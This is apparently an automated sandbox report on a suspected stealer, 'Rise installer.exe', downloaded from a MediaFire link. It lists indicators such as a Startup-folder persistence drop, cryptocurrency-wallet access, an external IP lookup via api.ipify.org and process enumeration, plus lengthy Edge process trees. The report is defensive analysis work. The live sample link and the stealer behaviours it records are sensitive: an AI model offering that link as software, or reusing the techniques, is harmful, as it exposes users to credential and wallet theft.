Analysis
-
max time kernel
170s -
max time network
170s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-04-2024 16:41
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.mediafire.com/file/x09kfni5o3qk1vi/Riseinstaller.zip/file
Resource
win11-20240426-en
General
-
Target
https://www.mediafire.com/file/x09kfni5o3qk1vi/Riseinstaller.zip/file
Malware Config
Signatures
-
Drops startup file 1 IoCs
Processes:
Rise installer.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rise installer.exe Rise installer.exe -
Loads dropped DLL 47 IoCs
Processes:
Rise installer.exepid process 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe 916 Rise installer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 123 api.ipify.org 221 api.ipify.org -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exeMiniSearchHost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Riseinstaller.zip:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exepid process 3432 msedge.exe 3432 msedge.exe 2704 msedge.exe 2704 msedge.exe 4140 identity_helper.exe 4140 identity_helper.exe 5256 msedge.exe 5256 msedge.exe 6112 msedge.exe 6112 msedge.exe 6116 msedge.exe 6116 msedge.exe 6116 msedge.exe 6116 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 31 IoCs
Processes:
msedge.exepid process 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
tasklist.exedescription pid process Token: SeDebugPrivilege 3644 tasklist.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid process 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe -
Suspicious use of SendNotifyMessage 16 IoCs
Processes:
msedge.exepid process 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
MiniSearchHost.exepid process 5032 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2704 wrote to memory of 2796 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2796 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 2308 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3432 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3432 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe PID 2704 wrote to memory of 3296 2704 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x09kfni5o3qk1vi/Riseinstaller.zip/file1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa49803cb8,0x7ffa49803cc8,0x7ffa49803cd82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5760 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7792 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8276 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7496 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8612 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8868 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9028 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9256 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9572 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9604 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8000 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9240 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9644 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7528 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9732 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7532 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8420 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\Rise installer.exe"C:\Users\Admin\Desktop\Rise installer.exe"1⤵
-
C:\Users\Admin\Desktop\Rise installer.exe"C:\Users\Admin\Desktop\Rise installer.exe"2⤵
- Drops startup file
- Loads dropped DLL
-
